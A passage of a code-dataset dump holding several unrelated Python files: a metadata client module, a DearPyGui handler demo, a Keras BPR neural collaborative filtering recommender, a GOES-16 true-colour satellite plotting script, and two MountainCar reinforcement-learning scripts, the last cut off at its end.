build/bdist.macosx-10.15-x86_64/egg/metadata_client/modules/instrument.py\n# Compiled at: 2019-11-15 04:27:31\n# Size of source mod 2**32: 2724 bytes\n\"\"\"Instrument module class\"\"\"\nfrom apis.instrument_api import InstrumentApi\nfrom common.base import Base\nfrom ..common.config import *\nMODULE_NAME = INSTRUMENT\n\nclass Instrument(InstrumentApi):\n\n def __init__(self, metadata_client, name, identifier, url, facility_id, instrument_type_id, repository_id, flg_available, description=''):\n self.metadata_client = metadata_client\n self.id = None\n self.name = name\n self.identifier = identifier\n self.url = url\n self.facility_id = facility_id\n self.instrument_type_id = instrument_type_id\n self.repository_id = repository_id\n self.flg_available = flg_available\n self.description = description\n\n @staticmethod\n def get_by_id(mdc_client, instrument_id):\n response = mdc_client.get_instrument_by_id_api(instrument_id)\n Base.cal_debug(MODULE_NAME, 'get_by_id', response)\n return Base.format_response(response, GET, OK, MODULE_NAME)\n\n @staticmethod\n def get_all_by_topic_id(mdc_client, facility_id):\n resp = mdc_client.get_all_instruments_by_topic_id_api(facility_id)\n Base.cal_debug(MODULE_NAME, 'get_all_by_topic_id', resp)\n return Base.format_response(resp, GET, OK, MODULE_NAME)\n\n @staticmethod\n def get_all_by_facility_id(mdc_client, facility_id):\n resp = mdc_client.get_all_instruments_by_facility_id_api(facility_id)\n Base.cal_debug(MODULE_NAME, 'get_all_by_facility_id', resp)\n return Base.format_response(resp, GET, OK, MODULE_NAME)\n\n @staticmethod\n def get_all_from_xfel(mdc_client):\n xfel_fac_id = 1\n resp = mdc_client.get_all_instruments_by_facility_id_api(xfel_fac_id)\n 
Base.cal_debug(MODULE_NAME, 'get_all_from_xfel', resp)\n return Base.format_response(resp, GET, OK, MODULE_NAME)\n\n @staticmethod\n def get_by_identifier(mdc_client, identifier):\n response = mdc_client.get_all_instruments_by_identifier_api(identifier)\n Base.cal_debug(MODULE_NAME, 'get_by_identifier', response)\n return Base.format_response(response, GET, OK, MODULE_NAME)\n\n def __get_resource(self):\n instrument = {MODULE_NAME: {'name':self.name, \n 'identifier':self.identifier, \n 'url':self.url, \n 'facility_id':self.facility_id, \n 'topic_id':self.topic_id, \n 'instrument_type_id':self.instrument_type_id, \n 'repository_id':self.repository_id, \n 'flg_available':self.flg_available, \n 'description':self.description}}\n return instrument","sub_path":"pycfiles/metadata_client-3.0.5-py3.7/instrument.cpython-37.py","file_name":"instrument.cpython-37.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"371793666","text":"import dearpygui.dearpygui as dpg\n\ndpg.create_context()\n\n\ndef change_text(sender, app_data):\n dpg.set_value(app_data[1], f\"Mouse Button ID: {app_data}\")\n\n\ndef visible_call(sender, app_data):\n print(\"I'm visible\")\n\n\nwith dpg.item_handler_registry(tag=\"widget handler\") as handler:\n dpg.add_item_clicked_handler(callback=change_text)\n dpg.add_item_visible_handler(callback=visible_call)\n\nwith dpg.window(width=500, height=300):\n text_1 = dpg.add_text(\"Click me with any mouse button\", tag=\"text item\")\n text_2 = dpg.add_text(\"Close window with arrow to change visible state printing to console\", tag=\"text item 2\")\n\n# bind item handler registry to item\ndpg.bind_item_handler_registry(text_1, \"widget handler\")\ndpg.bind_item_handler_registry(text_2, \"widget handler\")\n\ndpg.create_viewport(title='Custom Title', width=800, height=600)\ndpg.setup_dearpygui()\ndpg.show_viewport()\ndpg.start_dearpygui()\ndpg.destroy_context()\n","sub_path":"CS/Programming_Languages/Python/Modules/exterior/topics/gui/dearPyGUI/documentation/_4_io_handlers_state_polling/_4_1_item_handlers/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"36809633","text":"from _operator import itemgetter\nfrom datetime import datetime as dt\nfrom datetime import timedelta as td\nfrom math import log10\nfrom math import sqrt\nimport random\nimport time\n\nimport keras\nfrom keras.layers.embeddings import Embedding\nfrom keras.regularizers import l2\nfrom pympler import asizeof\nimport scipy.sparse\nfrom scipy.sparse.csc import csc_matrix\nimport theano\n\nimport keras.backend as K\nimport keras.layers as kl\nimport keras.models as km\nimport numpy as np\nimport pandas as pd\nimport theano.tensor as T\n\n\nclass BPRNeuralCollaborativeFiltering:\n '''\n BPRNeuralCollaborativeFiltering( factors=8, layers=[64,32,16,8], batch=100, optimizer='adam', learning_rate=0.001, momentum=0.0, reg=0.01, emb_reg=1e-7, layer_reg=1e-7, dropout=0.0, skip=0, samples=2048, activation='linear', objective='bpr_max', epochs=10, shuffle=-1, include_artist=False, session_key = 'playlist_id', item_key= 'track_id', user_key= 'playlist_id', artist_key='artist_id', time_key= 'pos' )\n\n Parameters\n -----------\n '''\n \n def __init__( self, factors=8, layers=[64,32,16,8], batch=100, optimizer='adam', learning_rate=0.001, momentum=0.0, reg=0.01, emb_reg=1e-7, layer_reg=1e-7, dropout=0.0, 
skip=0, samples=2048, activation='linear', objective='bpr_max', epochs=10, shuffle=-1, include_artist=False, session_key = 'playlist_id', item_key= 'track_id', user_key= 'playlist_id', artist_key='artist_id', time_key= 'pos' ):\n \n self.factors = factors\n self.layers = layers\n self.batch = batch\n self.learning_rate = learning_rate\n self.momentum = momentum\n self.optimizer = optimizer\n self.regularization = reg\n self.samples = samples\n self.dropout = dropout\n self.skip = skip\n self.shuffle = shuffle\n self.epochs = epochs\n self.activation = activation\n self.objective = objective\n self.include_artist = include_artist\n \n self.emb_reg = emb_reg\n self.layer_reg = layer_reg\n self.final_reg = reg\n \n self.session_key = session_key\n self.item_key = item_key\n self.user_key = user_key\n self.artist_key = artist_key\n self.time_key = time_key\n \n self.floatX = theano.config.floatX\n self.intX = 'int32'\n \n \n def train(self, train, test=None):\n '''\n Trains the predictor.\n \n Parameters\n --------\n data: pandas.DataFrame\n Training data. It contains the transactions of the sessions. It has one column for session IDs, one for item IDs and one for the timestamp of the events (unix timestamps).\n It must have a header. Column names are arbitrary, but must correspond to the ones you set during the initialization of the network (session_key, item_key, time_key properties).\n \n '''\n \n data = train['actions']\n datat = test['actions']\n \n data = pd.concat( [data, datat] )\n \n start = time.time()\n \n self.unique_items = data[self.item_key].unique().astype( self.intX )\n \n self.num_items = data[self.item_key].nunique()\n self.num_users = data[self.user_key].nunique()\n self.num_artists = data[self.artist_key].nunique()\n #idx = [data[self.item_key].max()+1] + list( data[self.item_key].unique() )\n self.itemmap = pd.Series( data=np.arange(self.num_items), index=data[self.item_key].unique() ).astype( self.intX )\n self.usermap = pd.Series( data=np.arange(self.num_users), index=data[self.user_key].unique() ).astype( self.intX )\n self.artistmap = pd.Series( data=np.arange(self.num_artists), index=data[self.artist_key].unique() ).astype( self.intX )\n\n print( 'finished init item and user map in {}'.format( ( time.time() - start ) ) )\n \n train = data\n \n start = time.time()\n \n self.num_sessions = train[self.session_key].nunique()\n \n train = pd.merge(train, pd.DataFrame({self.item_key:self.itemmap.index, 'ItemIdx':self.itemmap[self.itemmap.index].values}), on=self.item_key, how='inner')\n train = pd.merge(train, pd.DataFrame({self.user_key:self.usermap.index, 'UserIdx':self.usermap[self.usermap.index].values}), on=self.user_key, how='inner')\n train = pd.merge(train, pd.DataFrame({self.artist_key:self.artistmap.index, 'ArtistIdx':self.artistmap[self.artistmap.index].values}), on=self.artist_key, how='inner')\n #train.sort_values([self.session_key, self.time_key], inplace=True)\n \n self.itemartistmap = train.groupby( 'ItemIdx' )['ArtistIdx'].min()\n self.itemartistmap = pd.Series( index=self.itemartistmap.index, data = self.itemartistmap.values )\n \n self.model, self.predict_model = self.init_model( train )\n \n print( 'finished init model in {}'.format( ( time.time() - start ) ) )\n \n start = time.time()\n \n for j in range( self.epochs ):\n \n starttmp = time.time()\n \n U, I, N, A, AN = self.get_train_data( train )\n \n print( 'finished creating samples in {}'.format( ( time.time() - starttmp ) ) )\n \n print( 'train epoch {} with {} examples'.format( j, len(U) ) )\n \n 
input = [np.array(U), np.array(I), np.array(N)]\n if self.include_artist:\n input += [ np.array(A), np.array(AN) ]\n \n hist = self.model.fit(input, #input\n None, # labels \n batch_size=self.batch, epochs=1, shuffle=True, verbose=2 )\n \n print( 'finished epoch {} in {}s'.format( j, ( time.time() - start ) ) )\n \n def get_train_data( self, train ):\n \n #train = train.sample(frac=1).reset_index(drop=True)\n \n train['ItemIdxNeg'] = np.random.choice( self.itemmap.values, len(train) )\n items = train['ItemIdxNeg'].values\n train['ArtistIdxNeg'] = self.itemartistmap[ items ].values\n return train['UserIdx'].values, train['ItemIdx'].values, train['ItemIdxNeg'].values, train['ArtistIdx'].values, train['ArtistIdxNeg'].values\n \n def init_model(self, train, std=0.01):\n \n #current_item = kl.Input( ( 1, ), name=\"current_item\" )\n \n item = kl.Input( (1,), dtype=self.intX )#, batch_shape=(self.,self.steps) )\n user = kl.Input( (1,), dtype=self.intX )#, batch_shape=(self.batch,1) )\n \n if self.include_artist:\n artist = kl.Input( (1,), dtype=self.intX )#, batch_shape=(self.batch,1) )\n \n emb_user_mf = Embedding( output_dim=self.factors, input_dim=self.num_users, embeddings_regularizer=l2(self.emb_reg) )\n emb_user = Embedding( output_dim=self.factors, input_dim=self.num_users, embeddings_regularizer=l2(self.emb_reg) )\n emb_item_mf = Embedding( output_dim=self.factors, input_dim=self.num_items, embeddings_regularizer=l2(self.emb_reg) )\n emb_item = Embedding( output_dim=self.factors, input_dim=self.num_items, embeddings_regularizer=l2(self.emb_reg) )\n \n if self.include_artist:\n emb_user_artist_mf = Embedding( output_dim=self.factors, input_dim=self.num_artists, embeddings_regularizer=l2(self.emb_reg) )\n emb_artist_mf = Embedding( output_dim=self.factors, input_dim=self.num_artists, embeddings_regularizer=l2(self.emb_reg) )\n emb_artist = Embedding( output_dim=self.factors, input_dim=self.num_artists, embeddings_regularizer=l2(self.emb_reg) )\n \n #MF PART \n \n uemb = kl.Flatten()( emb_user_mf( user ) )\n iemb = kl.Flatten()( emb_item_mf( item ) )\n \n mf_dot = kl.Dot(1)( [uemb, iemb] )\n mf_mul = kl.Multiply()( [uemb, iemb] )\n \n mf_vector = kl.Concatenate()( [mf_mul, mf_dot] )\n \n #mf_vector = mf_mul\n \n if self.include_artist:\n uemb = kl.Flatten()( emb_user_artist_mf( user ) )\n aemb = kl.Flatten()( emb_artist_mf( item ) )\n mf_dot = kl.Dot(1)( [uemb, aemb] )\n mf_mul = kl.Multiply()( [uemb, aemb] )\n \n mf_vector = kl.Concatenate()( [mf_vector, mf_mul, mf_dot] )\n \n #MLP PART\n \n uemb = kl.Flatten()( emb_user( user ) )\n iemb = kl.Flatten()( emb_item( item ) )\n \n mlp_vector = kl.Concatenate()( [uemb, iemb] )\n if self.include_artist:\n emba = kl.Flatten()( emb_artist( artist ) )\n mlp_vector = kl.Concatenate()( [mlp_vector, emba] )\n \n for i in range( len(self.layers) ):\n layer = kl.Dense( self.layers[i], activation='relu', name=\"layer%d\" %i, kernel_regularizer=l2(self.layer_reg) )\n mlp_vector = layer(mlp_vector)\n \n #PRED PART\n \n comb = kl.Concatenate()( [ mf_vector , mlp_vector ] ) #, uemb ] )\n \n fff = kl.Dense( 1, activation='linear', kernel_initializer='lecun_uniform', kernel_regularizer=l2(self.layer_reg) )\n res = fff(comb)\n \n inputs = [ user, item ] #+ [artist\n if self.include_artist:\n inputs += [ artist ]\n outputs = [ res ]\n \n predict_model = km.Model( inputs, outputs )\n \n current_user = kl.Input( ( 1, ), name=\"current_user\" )# , batch_shape=(self.batch, self.steps) )\n current_item_pos = kl.Input( (1,), dtype=self.intX, name=\"current_item_pos\" 
)#, batch_shape=(self.batch,1) )\n current_item_neg = kl.Input( (1,), dtype=self.intX, name=\"current_item_neg\" )#, batch_shape=(self.batch,1) )\n \n pred_from_pos = [ current_user, current_item_pos ]\n pred_from_neg = [ current_user, current_item_neg ]\n \n if self.include_artist:\n current_artist_pos = kl.Input( ( 1, ), name=\"current_artist_pos\" )# , batch_shape=(self.batch, self.steps) )\n current_artist_neg = kl.Input( ( 1, ), name=\"current_artist_neg\" )# , batch_shape=(self.batch, self.steps) )\n pred_from_neg += [current_artist_neg]\n pred_from_pos += [current_artist_pos]\n \n current_res_pos = predict_model( pred_from_pos ) #, current_user ] )\n current_res_neg = predict_model( pred_from_neg ) #, current_user ] )\n \n inputs = [ current_user, current_item_pos, current_item_neg ] #+ [current_user]\n if self.include_artist:\n inputs += [current_artist_pos,current_artist_neg]\n outputs = [ current_res_pos, current_res_neg ]\n \n model = km.Model( inputs, outputs )\n model.add_loss(K.mean( self.bpr(outputs) ))\n \n if self.optimizer == 'adam': \n opt = keras.optimizers.Adam(lr=self.learning_rate)\n elif self.optimizer == 'adagrad':\n opt = keras.optimizers.Adagrad(lr=self.learning_rate)\n elif self.optimizer == 'adadelta':\n opt = keras.optimizers.Adadelta(lr=self.learning_rate*10)\n elif self.optimizer == 'sgd':\n opt = keras.optimizers.SGD(lr=self.learning_rate)\n \n model.compile( optimizer=opt )\n \n return model, predict_model\n \n def bpr(self, out):\n pos, neg = out\n obj = -K.sum( K.log( K.sigmoid( pos - neg ) ) )\n return obj\n \n def predict( self, name=None, tracks=None, playlist_id=None, artists=None ):\n '''\n Gives predicton scores for a selected set of items on how likely they be the next item in the session.\n \n Parameters\n --------\n name : int or string\n The session IDs of the event.\n tracks : int list\n The item ID of the event. Must be in the set of item IDs of the training set.\n \n Returns\n --------\n res : pandas.DataFrame\n Prediction scores for selected items on how likely to be the next item of this session. 
Indexed by the item IDs.\n \n '''\n \n sitems = tracks if tracks is not None else []\n \n if len(sitems) == 0:\n res_dict = {}\n res_dict['track_id'] = []\n res_dict['confidence'] = []\n return pd.DataFrame.from_dict(res_dict)\n \n \n u = np.full( self.num_items , self.usermap[playlist_id], dtype=self.intX)\n i = np.array( self.itemmap.values )\n input = [ u,i ]\n if self.include_artist:\n a = np.array( self.artistmap[ self.itemartistmap[ self.itemmap.values ] ] )\n input += [a]\n# usera = np.zeros((1))\n# usera[0] = self.usermap[input_user_id]\n \n \n \n predictions = self.predict_model.predict( input, batch_size=len(i) ) #, usera ] )\n #predictions = self.predict( self.session_items, self.itemmap[input_item_id], self.usermap[input_user_id] )\n \n try:\n \n # Create things in the format\n res_dict = {}\n res_dict['track_id'] = list(self.itemmap.index)\n res_dict['confidence'] = predictions.T[0]\n res = pd.DataFrame.from_dict(res_dict)\n \n res = res[ ~np.in1d( res.track_id, sitems ) ]\n \n res.sort_values( 'confidence', ascending=False, inplace=True )\n \n except Exception:\n print( 'hö' )\n print( self.itemmap.index )\n print( predictions )\n print( len(predictions[0]) )\n exit()\n \n return res.head(500)\n \n","sub_path":"RecSys2018-team-KAENEN_main_creative-7th_3rd-place/algorithms/mf/ncf_bpr.py","file_name":"ncf_bpr.py","file_ext":"py","file_size_in_byte":13673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"436646107","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 14 10:48:41 2018\n\n@author: cpaessvisitor\n\"\"\"\n\nfrom netCDF4 import Dataset\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom netCDF4 import Dataset\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.basemap import Basemap # Import the Basemap toolkit\nfrom pyproj import Proj\nfrom matplotlib.colors import LinearSegmentedColormap\nimport numpy as np\nimport os\nimport glob\nimport sys\n\n\n#RGB values must be between 0 and 1\n\n# Rebin function from https://stackoverflow.com/questions/8090229/resize-with-averaging-or-rebin-a-numpy-2d-array\ndef rebin(a, shape):\n sh = shape[0],a.shape[0]//shape[0],shape[1],a.shape[1]//shape[1]\n return a.reshape(sh).mean(-1).mean(1)\n\n\nformatstr = '*L1b-RadC-M3C'\ndatestr = '*s2017*' \n\n\n#Put into fns all the files from a directory corresponding to year 2017, a certain day and a certain hour\nfns = []\nnch = 1\nfor nch in range(1,17):\n chstr = str(nch).zfill(2)\n fns.append(sorted(glob.glob(formatstr+chstr+datestr+'*.nc')))\n\n\n#Get the number of photographies per band\nnum_photos = np.shape(fns)[1]\n\n#Choose the number of the photography (i.e 0)\nphoto = 10\n\n#Get the full name of the path to the nc file\nfn1 = fns[0][photo]\npath = fn1\n\n\n# Search for the Scan start in the file name\nStart = (path[path.find(\"s\")+1:path.find(\"_e\")])\nStart_Formatted = Start[0:4] + \" Day \" + Start[4:7] + \" - \" + Start [7:9] + \":\" + Start [9:11] + \":\" + Start [11:13] + \".\" + Start [13:14] + \" UTC\"\n# Search for the Scan end in the file name\nEnd = (path[path.find(\"e\")+1:path.find(\"_c\")])\nEnd_Formatted = End[0:4] + \" Day \" + End[4:7] + \" - \" + End [7:9] + \":\" + End [9:11] + \":\" + End [11:13] + \".\" + End [13:14] + \" UTC\"\n\n#Find files corresponding to red and veggie and IR\nifn2 = [i for i, s in enumerate(fns[1][:]) if Start in s]\nifn3 = [i for i, s in enumerate(fns[2][:]) if Start in s]\nifn13 = [i for i, s in 
enumerate(fns[12][:]) if Start in s]\n\n#Get the path of these three files\nfn2 = fns[1][ifn2[0]]\nStart2 = (fn2[fn2.find(\"s\")+1:fn2.find(\"_e\")])\nfn3 = fns[2][ifn3[0]]\nStart3 = (fn3[fn3.find(\"s\")+1:fn3.find(\"_e\")])\nfn13 = fns[12][ifn13[0]]\nStart13 = (fn13[fn13.find(\"s\")+1:fn13.find(\"_e\")])\n \n\n\n# Define some constants needed for the conversion of radiance per unit wavenumber to radiance only\nEsun_Ch_01 = 726.721072\nEsun_Ch_02 = 663.274497\nEsun_Ch_03 = 441.868715\nd2 = 0.3\n\n\n#Load Channel 1 - Blue Visible\ng16nc = Dataset(fn1)\nradiance_1 = g16nc.variables['Rad'][:]\ng16nc.close()\ng16nc = None\nref_1 = (radiance_1 * np.pi * d2) / Esun_Ch_01\n# Make sure all data is in the valid RGB data range\nref_1 = np.maximum(ref_1, 0.0)\nref_1 = np.minimum(ref_1, 1.0)\nref_gamma_1 = np.sqrt(ref_1)\n\n#Load Channel 2 - Red Visible\ng16nc = Dataset(fn2)\nradiance_2 = g16nc.variables['Rad'][:]\ng16nc.close()\ng16nc = None\nref_2 = (radiance_2 * np.pi * d2) / Esun_Ch_02\n# Make sure all data is in the valid RGB data range\nref_2 = np.maximum(ref_2, 0.0)\nref_2 = np.minimum(ref_2, 1.0)\nref_gamma_2 = np.sqrt(ref_2)\nref_gamma_2 = rebin(ref_gamma_2, ref_gamma_1.shape)\n\n# Load Channel 3 - Veggie Near IR\ng16nc = Dataset(fn3)\nradiance_3 = g16nc.variables['Rad'][:]\ng16nc.close()\ng16nc = None\nref_3 = (radiance_3 * np.pi * d2) / Esun_Ch_03\n# Make sure all data is in the valid RGB data range\nref_3 = np.maximum(ref_3, 0.0)\nref_3 = np.minimum(ref_3, 1.0)\nref_gamma_3 = np.sqrt(ref_3)\n\n#Turn veggie into approximate green\nref_gamma_3_true = 0.48358168 * ref_gamma_2 + 0.45706946 * ref_gamma_1 + 0.06038137 * ref_gamma_3\n\n\n#Do something to have the space white\nmasque = np.where(ref_gamma_3.mask == True)\nalpha = np.ones(ref_gamma_3.shape)\nalpha[masque] = 0.0\n\n\n#Plot geostationnary picture\ntruecolor = np.stack([ref_gamma_2, ref_gamma_3_true, ref_gamma_1, alpha], axis=2)\nim = plt.imshow(truecolor)\nplt.title(\"True Color\" + \"\\n Scan from \" + Start_Formatted + \" to \" + End_Formatted, color='black')\nplt.show()\n\n\n\n\n\n\n#More sophisticated plot\ng16nc = Dataset(fn1)\n# Satellite height\nsat_h = g16nc.variables['goes_imager_projection'].perspective_point_height\n\n# Satellite longitude\nsat_lon = g16nc.variables['goes_imager_projection'].longitude_of_projection_origin\n\n# Satellite sweep\nsat_sweep = g16nc.variables['goes_imager_projection'].sweep_angle_axis\n\n# The projection x and y coordinates equals\n# the scanning angle (in radians) multiplied by the satellite height (http://proj4.org/projections/geos.html)\nX = g16nc.variables['x'][:] * sat_h\nY = g16nc.variables['y'][:] * sat_h\n\n\n# The geostationary projection is perhaps the easiest way to plot the image on a map.\n# Essentially, we are stretching the image across a map with the same projection and dimensions.\nm = Basemap(projection='geos', lon_0=sat_lon,\n resolution='i', area_thresh=5000,\n llcrnrx=X.min(),llcrnry=Y.min(),\n urcrnrx=X.max(),urcrnry=Y.max())\n\n\nplt.figure(figsize=[15, 12])\nm.imshow(np.flipud(truecolor)) # Remember, \"images\" are upside down, so flip up/down\nm.drawcoastlines()\nm.drawcountries()\nm.drawstates()\n\nplt.title(\"True Color\" + \"\\n Scan from \" + Start_Formatted + \" to \" + End_Formatted, color='black')\n\ng16nc.close()\n\n\n\n\n\n\n\n\n\n\n\n\n ","sub_path":"Code_Files/Plot_TrueColor_ncdf4.py","file_name":"Plot_TrueColor_ncdf4.py","file_ext":"py","file_size_in_byte":5160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} 
+{"seq_id":"536170096","text":"import numpy as np\nimport gym\nimport random\nimport math\nimport tensorflow as tf\nimport matplotlib.pylab as plt\n\n# size of the training batch\nBATCH_SIZE=50\n\nMAX_EPS = 1\nMIN_EPS = 0.01\nLAMBDA = 0.0001\nGAMMA = 0.99\n\nclass Memory:\n \"\"\"\n The memory class\n stores samples (state,action,reward,nextState) as tuples into _samples\n\n Attributes\n ----------\n _samples : list of tuples\n list containing max_memory elements\n _max_memory : int\n maximum number of tuples that can be injected into _samples\n \"\"\"\n\n def __init__(self, max_memory):\n \"\"\" initialize the memory list \"\"\"\n self._max_memory = max_memory\n self._memory = []\n\n def addSample(self, sample):\n \"\"\" add a sample to the memory list \"\"\"\n self._memory.append(sample)\n if len(self._memory) > self._max_memory:\n self._memory.pop(0)\n\n def samples(self, nb_samples):\n \"\"\" return a random sample with nb_samples elements \"\"\"\n if nb_samples > len(self._memory):\n nb_samples = len(self._memory)\n return random.sample(self._memory,nb_samples)\n\n def size(self):\n return len(self._memory)\n\n# initialize the Memory\nmem = Memory(50000)\neps = MAX_EPS\n\n# initialize the game\nenv_name = 'MountainCar-v0'\nenv = gym.make(env_name)\nnumStates = env.env.observation_space.shape[0]\nnumActions = env.env.action_space.n\nprint(\"This game is a {} actions game\".format(numActions))\nprint(\"Environment is described by a {} elements vector\".format(numStates))\ninput(\"Press Enter to continue...\")\n\n# initialize the model\n# input is a 2 dim vector or tensor (x position, velocity)\ntf.keras.backend.set_floatx('float64')\ninputs=tf.keras.Input(shape=(numStates,), name='states')\nx=tf.keras.layers.Dense((50), activation='relu')(inputs)\nx=tf.keras.layers.Dense((50), activation='relu')(x)\noutputs=tf.keras.layers.Dense(numActions,activation='linear')(x)\nmodel=tf.keras.Model(inputs=inputs,outputs=outputs,name='myLittleCar')\nmodel.compile(loss=\"mse\",optimizer=\"adam\",metrics=['mae'])\nprint(\"model created\")\nmodel.summary()\ninput(\"Press Enter to continue...\")\nprint(\"model starting to play the game\")\nnum_episodes = 300\n\nsteps=0\nreward_store = []\nmax_x_store = []\n\nfor episode in range(num_episodes):\n state = env.reset()\n if episode % 10 == 0:\n print('Episode {} of {}'.format(episode+1, num_episodes))\n print(\"memory length is {}\".format(mem.size()))\n tot_reward = 0\n max_x = -100\n while True:\n env.render()\n\n if random.random() < eps:\n action = random.randint(0, numActions - 1)\n else:\n rspd=state.reshape(1,numStates)\n # do not use high level function such as predict or predict_classes (in case you dont have to use argmax)\n predictionBrute = model(rspd)\n action = np.argmax(predictionBrute)\n\n # we realize the action\n nextState, reward, done, info = env.step(action)\n\n if nextState[0] >= 0.5:\n reward += 100\n print(\"Top of the hill reached after {} timesteps\".format(steps))\n elif nextState[0] >= 0.25:\n reward += 20\n elif nextState[0] >= 0.1:\n reward += 10\n if nextState[0] > max_x:\n max_x = nextState[0]\n if done:\n nextState = None\n\n # feed the memory\n mem.addSample((state,action,reward,nextState))\n\n # train the model - only if we have something representative in the memory\n if mem.size() > BATCH_SIZE * 3:\n train_samples=mem.samples(BATCH_SIZE)\n nb=len(train_samples)\n #print(\"we are going to train on a batch with {} elements\".format(nb))\n state_samples= np.array([val[0] for val in train_samples])\n nextState_samples= 
np.array([(np.zeros(numStates) if val[3] is None else val[3]) for val in train_samples])\n qsa=model(state_samples)\n qsad=model(nextState_samples)\n x=np.zeros((nb,numStates))\n y=np.zeros((nb,numActions))\n\n # according to the structure adopted for the memory\n # b[0] is state, b[1] is action, b[2] is reward and b[3] is the nextState\n for i, b in enumerate(train_samples):\n current_q = tf.unstack(qsa[i])\n if b[3] is None:\n current_q[b[1]]=b[2]\n else:\n current_q[b[1]]=b[2]+GAMMA*np.amax(qsad[i])\n x[i] = b[0]\n y[i] = tf.stack(current_q)\n\n # do not use model.fit(x, y, epochs=1, verbose=0)\n model.train_on_batch(x, y)\n\n # prepare next iteration\n # increase the step counter\n steps+=1\n # evaluate the new value for eps\n eps = MIN_EPS + (MAX_EPS - MIN_EPS) * math.exp(-LAMBDA * steps)\n # update state\n state = nextState\n\n tot_reward += reward\n\n if done:\n reward_store.append(tot_reward)\n max_x_store.append(max_x)\n break\n\n print(\"step {} Total reward {} Eps {}\".format(steps,tot_reward,eps))\n\nenv.close()\nplt.plot(reward_store)\nplt.show()\nplt.close(\"all\")\nplt.plot(max_x_store)\nplt.show()\nmodel.save('moutainCar.h5')\n","sub_path":"MountainCarPB/rl_MoutainCar_AC.py","file_name":"rl_MoutainCar_AC.py","file_ext":"py","file_size_in_byte":5218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"15256386","text":"#!/usr/bin/env python3\nimport gym\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nRENDER_EVERY = 200000\nSTATS_EVERY = 50\n\nBUCKET_AMOUNT = [20, 20]\nenv = gym.make('MountainCar-v0')\nBUCKET_SIZE = (env.observation_space.high - env.observation_space.low) / BUCKET_AMOUNT\n\n\ndef get_discrete_state(state):\n discrete_state = (state - env.observation_space.low) / BUCKET_SIZE\n return tuple(discrete_state.astype(np.int))\n\n\n# tune learning rate\ndef qlearning(env, q_table, alpha=0.1, gamma=0.9, epsilon=0.1,\n initial_learning_rate=1.0, min_learning_rate=0.005, num_ep=int(5000)):\n\n ep_rewards = []\n ep_lengths = []\n ep_goal = []\n aggr_ep_rewards = {'ep': [], 'avg': [], 'max': [], 'min': []}\n aggr_ep_goal = {'ep': [], 'goal': [], 'length': []}\n\n for episode in range(num_ep):\n episode_reward = 0\n episode_length = 0\n reached_goal = 0\n\n state = env.reset()\n discrete_state = get_discrete_state(state)\n done = False\n\n learning_rate = max(min_learning_rate, initial_learning_rate * (0.85 ** (episode // 100)))\n\n while not done:\n if np.random.uniform(0, 1) > epsilon:\n action = np.argmax(q_table[discrete_state])\n else:\n action = env.action_space.sample()\n\n new_state, reward, done, _ = env.step(action)\n new_discrete_state = get_discrete_state(new_state)\n\n if (episode + 1) % RENDER_EVERY == 0:\n env.render()\n\n q_table[discrete_state + (action,)] += learning_rate * (reward + gamma *\n np.max(q_table[new_discrete_state]) -\n q_table[discrete_state + (action,)])\n\n if new_state[0] >= env.goal_position:\n reached_goal += 1\n\n discrete_state = new_discrete_state\n\n episode_reward += reward\n episode_length += 1\n\n ep_rewards.append(episode_reward)\n ep_lengths.append(episode_length)\n ep_goal.append(reached_goal)\n\n if not episode % STATS_EVERY:\n if episode == 0:\n average_reward = ep_rewards[0]\n else:\n average_reward = sum(ep_rewards[-STATS_EVERY:]) / STATS_EVERY\n aggr_ep_rewards['ep'].append(episode)\n aggr_ep_rewards['avg'].append(average_reward)\n aggr_ep_rewards['max'].append(max(ep_rewards[-STATS_EVERY:]))\n aggr_ep_rewards['min'].append(min(ep_rewards[-STATS_EVERY:]))\n if 
episode == 0:\n average_goal = ep_goal[0]\n else:\n average_goal = sum(ep_goal[-STATS_EVERY:]) / STATS_EVERY\n if episode == 0:\n average_length = ep_lengths[0]\n else:\n average_length = sum(ep_lengths[-STATS_EVERY:]) / STATS_EVERY\n aggr_ep_goal['ep'].append(episode)\n aggr_ep_goal['goal'].append(average_goal)\n aggr_ep_goal['length'].append(average_length)\n print(f'Episode: {episode:>5d}, average reward: {average_reward:>4.1f}, learning_rate: {learning_rate:>0.2f}')\n\n env.close()\n\n plt.plot(aggr_ep_rewards['ep'], aggr_ep_rewards['avg'],\n label=\"aggregated average rewards of \" + str(STATS_EVERY) + \" episodes\")\n plt.plot(aggr_ep_rewards['ep'], aggr_ep_rewards['max'],\n label=\"aggregated max rewards of \" + str(STATS_EVERY) + \" episodes\")\n plt.plot(aggr_ep_rewards['ep'], aggr_ep_rewards['min'],\n label=\"aggregated min rewards of \" + str(STATS_EVERY) + \" episodes\")\n plt.legend(loc=2)\n plt.grid(True)\n plt.savefig('reward.png')\n # plt.show()\n plt.clf()\n\n return ep_goal, ep_lengths\n\n\ndef main():\n reached_goals = []\n episode_lengths = []\n for i in range(10):\n q_table = np.random.uniform(low=-2, high=0, size=(BUCKET_AMOUNT + [env.action_space.n]))\n reached_goal, episode_length = qlearning(env, q_table)\n reached_goals.append(reached_goal)\n episode_lengths.append(episode_length)\n env.close()\n\n episodes = [i for i in range(np.mean(reached_goals, axis=0).shape[0])]\n\n plt.plot(episodes, np.mean(reached_goals, axis=0), label=\"reaching goal\")\n plt.legend(loc=2)\n plt.grid(True)\n plt.savefig('goal.png')\n # plt.show()\n\n plt.clf()\n plt.plot(episodes, np.mean(episode_lengths, axis=0), label=\"episode length\")\n plt.legend(loc=2)\n plt.grid(True)\n plt.savefig('length.png')\n # plt.show()\n\n\nif __name__ == \"__main__\":\n 